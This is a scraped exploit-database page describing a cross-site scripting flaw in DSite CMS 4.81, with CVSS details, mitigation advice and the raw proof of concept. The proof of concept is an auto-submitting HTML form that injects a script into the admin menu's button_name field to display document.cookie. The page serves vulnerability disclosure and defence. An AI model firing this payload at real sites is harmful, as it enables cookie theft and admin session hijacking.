Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Cross-Site Scripting in DSite CMS - exploit.company
header-logo
Suggest Exploit
vendor:
DSite CMS
by:
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: DSite CMS
Affected Version From: 4.81
Affected Version To: 4.81
Patch Exists: NO
Related CWE:
CPE: a:dsite_cms:dsite_cms:4.81
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting in DSite CMS

DSite CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize and validate user-supplied input before using it in web pages or applications. Implementing strict input validation and output encoding can help prevent cross-site scripting attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41724/info

DSite CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

DSite CMS 4.81 is vulnerable; prior versions may also be affected. 

<form action="http://www.example.com/admin/plugin.php?menu_id=1&module=menu&plitem=modmenu.php" method="post" name="main" >
<input type="hidden" name="module" value="menu" />
<input type="hidden" name="plitem" value="modmenu.php" />
<input type="hidden" name="menu_id" value="1" />
<input type="hidden" name="button_name" value='bn"><script>alert(document.cookie)</script>' />
<input type="hidden" name="new_make" value="YES" />
</form>
<script>
document.main.submit();
</script>